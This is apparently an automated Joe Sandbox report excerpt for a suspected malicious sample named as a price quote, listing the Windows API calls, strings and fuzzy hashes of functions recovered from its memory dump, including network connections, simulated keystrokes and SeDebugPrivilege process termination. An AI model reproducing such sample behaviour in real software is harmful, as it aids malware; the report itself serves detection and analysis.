Instruction ID: a0e012240574d30e49cf1bd74eae8ddfae508eb7a1c5753e8230d54743f7520e
Opcode Fuzzy Hash: 7e50035ac2264b8a6fe50abdfdfadf64083a9ace994e50864abf5ddb6021eab1
Instruction Fuzzy Hash: 2F518870640209EFDF20CF68CC55BAA7BBAFB58760F14891DF912972A0DB74E991DB40

Uniqueness

Uniqueness Score: -1.00%

Function 009FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009FC182
GetLastError.KERNEL32 ref: 009FC195
SetEvent.KERNEL32(?), ref: 009FC1A9

Part of subcall function 009FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009FC272
Part of subcall function 009FC253: GetLastError.KERNEL32 ref: 009FC322
Part of subcall function 009FC253: SetEvent.KERNEL32(?), ref: 009FC336
Part of subcall function 009FC253: InternetCloseHandle.WININET(00000000), ref: 009FC341

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 1f269a1e94cbcf3a8e7580f2637ccd7cd3bce9a6f6fcbd6cb970b9c17a8b0ceb
Instruction ID: c57ce617caa4b3186952ab91940a701b646d9e6d789d02157dbcf96d84ff3930
Opcode Fuzzy Hash: 1f269a1e94cbcf3a8e7580f2637ccd7cd3bce9a6f6fcbd6cb970b9c17a8b0ceb
Instruction Fuzzy Hash: A6318BB124060DAFDB219FE59E44AF6BBE8FF58320B14C41DFA6682611C730E8159B60

Uniqueness

Uniqueness Score: -1.00%

Function 009E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009E25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009E25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009E25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009E25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009E2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009E2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 009E260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009E2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009E2627

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 3cddbe7e8ea17db3aac18fdd769a4fce10d956964f69cb2d2be8ecbed717ee7f
Instruction ID: dead46333b6bcbb873092e42e4d06ff1e805c037b1004b2071915f42ca69a5b3
Opcode Fuzzy Hash: 3cddbe7e8ea17db3aac18fdd769a4fce10d956964f69cb2d2be8ecbed717ee7f
Instruction Fuzzy Hash: 4801D8303D0364BBFB10A7A9DC8EF993F59DB8EB21F104011F358AF0D1C9E118458A69

Uniqueness

Uniqueness Score: -1.00%

Function 009E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009E1449,?,?,00000000), ref: 009E180C
HeapAlloc.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009E1449,?,?,00000000), ref: 009E1828
GetCurrentProcess.KERNEL32(?,00000000,?,009E1449,?,?,00000000), ref: 009E1830
DuplicateHandle.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009E1449,?,?,00000000), ref: 009E1843
GetCurrentProcess.KERNEL32(009E1449,00000000,?,009E1449,?,?,00000000), ref: 009E184B
DuplicateHandle.KERNEL32(00000000,?,009E1449,?,?,00000000), ref: 009E184E
CreateThread.KERNEL32(00000000,00000000,009E1874,00000000,00000000,00000000), ref: 009E1868

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 882c0a994731823158184c5e8e0bf6d12a22ab79834400bdec90254fabcd1650
Instruction ID: 519dc912583f42bd5d2b3638bf07e9561327de0df89a22db476e90b88151b18a
Opcode Fuzzy Hash: 882c0a994731823158184c5e8e0bf6d12a22ab79834400bdec90254fabcd1650
Instruction Fuzzy Hash: 4501BFB52C0344BFE710EBA5DC4DF977B6CEB89B11F008511FA05DB191C6709801CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 009ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 009ED501
Part of subcall function 009ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 009ED50F
Part of subcall function 009ED4DC: CloseHandle.KERNEL32(00000000), ref: 009ED5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A0A16D
GetLastError.KERNEL32 ref: 00A0A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A0A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A0A268
GetLastError.KERNEL32(00000000), ref: 00A0A273
CloseHandle.KERNEL32(00000000), ref: 00A0A2C4

Strings

SeDebugPrivilege, xrefs: 00A0A18F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 3b70ee5650e948a2b94b5a30913474ebe2dbba0b1c591b2c556a4b8e59f906cd
Instruction ID: 44c48c63f344401e66e41aaf9b57a872cae9d1c00f6691159a20061962e81308
Opcode Fuzzy Hash: 3b70ee5650e948a2b94b5a30913474ebe2dbba0b1c591b2c556a4b8e59f906cd
Instruction Fuzzy Hash: B1617C71204342AFD710DF15D494F59BBA1AFA8318F14849CE4668B7E3C772ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A13886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A13925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A1393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A13954
_wcslen.LIBCMT ref: 00A13999
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A139C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A139F4

Strings

SysListView32, xrefs: 00A138F7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: b4c4154f136de344c1305c3a60e41dfc296bf45e0892dcc7323565e7e43738ec
Instruction ID: c3764c39f0c2982875077089cb3af6d37ea3d2d2d5b2055503bf9a155f1b1eed
Opcode Fuzzy Hash: b4c4154f136de344c1305c3a60e41dfc296bf45e0892dcc7323565e7e43738ec
Instruction Fuzzy Hash: 2E418172A00219ABEF219F64CC45BEA7BA9FF48350F100526F958E7281D7759E94CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009EBCFD
IsMenu.USER32(00000000), ref: 009EBD1D
CreatePopupMenu.USER32 ref: 009EBD53
GetMenuItemCount.USER32(015E5100), ref: 009EBDA4
InsertMenuItemW.USER32(015E5100,?,00000001,00000030), ref: 009EBDCC

Strings

0, xrefs: 009EBCA8
2, xrefs: 009EBD37

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 11f39d49b84b8f5cf9044b8f5eef02bf6496560539bb03a2211eb5e13fe9d43e
Instruction ID: 918febb205383624de96554564321f39ad35ace7c600fe664b46f04c083c3956
Opcode Fuzzy Hash: 11f39d49b84b8f5cf9044b8f5eef02bf6496560539bb03a2211eb5e13fe9d43e
Instruction Fuzzy Hash: C251BEB0A00289ABDF12CFAADC84BAFBBF9BF85324F148119E551972D0D7709D81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009EC913

Strings

warning, xrefs: 009EC8FC
question, xrefs: 009EC8CC
blank, xrefs: 009EC895
info, xrefs: 009EC8B4
stop, xrefs: 009EC8E4

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f0f1bb452b8ce105a9d2337bcf703dfb356b6b6ea50108f9c557ce6860598d0b
Instruction ID: 6bcb7d90ae21acbd664ee5d54e023ec5058721accfe7e00f53f9a2e9a6b07b03
Opcode Fuzzy Hash: f0f1bb452b8ce105a9d2337bcf703dfb356b6b6ea50108f9c557ce6860598d0b
Instruction Fuzzy Hash: 81118C76689346BEE7029B55DD83DEE379CDF56324B20042AF440A62C3E7F85E0252A9

Uniqueness

Uniqueness Score: -1.00%

Function 009EED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009EED2A
_wcslen.LIBCMT ref: 009EED3B
_wcslen.LIBCMT ref: 009EED79
_wcslen.LIBCMT ref: 009EEDAF
_wcslen.LIBCMT ref: 009EEDDF
_wcslen.LIBCMT ref: 009EEDEF
_wcslen.LIBCMT ref: 009EEE2B
_wcslen.LIBCMT ref: 009EEE5A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 0017f2d240eeed9f9599c06b3120c85055ad8af7a7100d539dff73ff7b82d84f
Instruction ID: e495e61a98cf468978a4fed5ed59fefc4f54fbe69111a412c67e5c30ca79238b
Opcode Fuzzy Hash: 0017f2d240eeed9f9599c06b3120c85055ad8af7a7100d539dff73ff7b82d84f
Instruction Fuzzy Hash: CE419065C10258B5CB11EBF48C8ABCFB7ACAF86710F508466E924E3121EB34E655C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 0099F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 0099F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 009DF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D682C,00000004,00000000,00000000), ref: 009DF454

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0099489d55bba76b9d2ee3b29d5d9425940b73efff9a926a6076dd25d5a16568
Instruction ID: 303dc4624b900ee95acb74ec4b265c758d45527f0aaf024e6bdcde0e2d84ab19
Opcode Fuzzy Hash: 0099489d55bba76b9d2ee3b29d5d9425940b73efff9a926a6076dd25d5a16568
Instruction Fuzzy Hash: 13413B31244640BEDF38DB3DC8B876AFB9AAB56364F14C43DE047D6660D675A881C710

Uniqueness

Uniqueness Score: -1.00%

Function 00A12D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A12D1B
GetDC.USER32(00000000), ref: 00A12D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A12D2E
ReleaseDC.USER32(00000000,00000000), ref: 00A12D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A12D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A12D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A15A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00A12DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A12DE1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 3c90fc37c82013648a78ba0ef1b41207026d385957de9f0db1bd3ca2606d397a
Instruction ID: c13b1d909920790b2cbcd601b869dd1a24d5e9881a98fe073374aa5ab57bd9a3
Opcode Fuzzy Hash: 3c90fc37c82013648a78ba0ef1b41207026d385957de9f0db1bd3ca2606d397a
Instruction Fuzzy Hash: 67319C72241214BFEB118F50DC8AFEB3BADEF09761F048055FE089A291C6759C51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 009E5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 009E5637
_memcmp.LIBVCRUNTIME ref: 009E5659
_memcmp.LIBVCRUNTIME ref: 009E5671
_memcmp.LIBVCRUNTIME ref: 009E5684
_memcmp.LIBVCRUNTIME ref: 009E569E
_memcmp.LIBVCRUNTIME ref: 009E56B1
_memcmp.LIBVCRUNTIME ref: 009E56C9
_memcmp.LIBVCRUNTIME ref: 009E56E4

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 3f284848acd6d5310b5028091f6152bc7c540afa2377b4f94ff81c8adade535c
Instruction ID: 443cfc3f9a228f10715c89f2c0e7f6e4beac2da3e456829d1ea05426c51d95e2
Opcode Fuzzy Hash: 3f284848acd6d5310b5028091f6152bc7c540afa2377b4f94ff81c8adade535c
Instruction Fuzzy Hash: 5A21EE71744A89BFDA169A228E92FFB335CBF6178CF450430FD049A581FB65ED1081E5

Uniqueness

Uniqueness Score: -1.00%

Function 00A04FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00A0502E, 00A05383
Not an Object type, xrefs: 00A05007

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 093722b4dc74f31e4a06df005c32670841dcfac7ce0d11938db9857ac5000379
Instruction ID: be24ef59bff360109649013a919add53f0d3f86af88ded3927f814239ae59bc9
Opcode Fuzzy Hash: 093722b4dc74f31e4a06df005c32670841dcfac7ce0d11938db9857ac5000379
Instruction Fuzzy Hash: 46D1BE75E0060AAFDF10DFA8E891BAEB7B5BF48304F148569E915AB281E370DD41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009C1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009C17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009C15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009C1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009C17FB,?,009C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009C16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009C16FB

Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009C1777
__freea.LIBCMT ref: 009C17A2
__freea.LIBCMT ref: 009C17AE

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 152e1b143b304c2c01b4a6825856faf30c9fa9c5ef4dc9e75da6b0533382eaa0
Instruction ID: 6be01a621404a29ad7cdcfc66cf35f5105a4e938ecb14abd9d55cf7a2e069f7d
Opcode Fuzzy Hash: 152e1b143b304c2c01b4a6825856faf30c9fa9c5ef4dc9e75da6b0533382eaa0
Instruction Fuzzy Hash: DE91B371E002569ADF208EA4C951FEEBBB99F8A310F18465DF805E7182D735CD40CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00A04523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A04648
VariantInit.OLEAUT32(?), ref: 00A04749
VariantClear.OLEAUT32(?), ref: 00A04753
VariantClear.OLEAUT32(?), ref: 00A047B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00A045D8, 00A04706, 00A047BE
Incorrect Object type in FOR..IN loop, xrefs: 00A0472C

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 9e8c18841299b07bac45e76a81c0762b149834cfcf7c98c295942327406f019b
Instruction ID: 39cdb9ec387d6128aeddd0dc0b598add0e2ff702cde51aaa0a8ea4fa2fcfdfce
Opcode Fuzzy Hash: 9e8c18841299b07bac45e76a81c0762b149834cfcf7c98c295942327406f019b
Instruction Fuzzy Hash: 959173B1A00219AFDF20CFA5D844FAEB7B8FF89714F108559F615AB281D7709941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 009F125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 009F1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009F12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009F1430

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
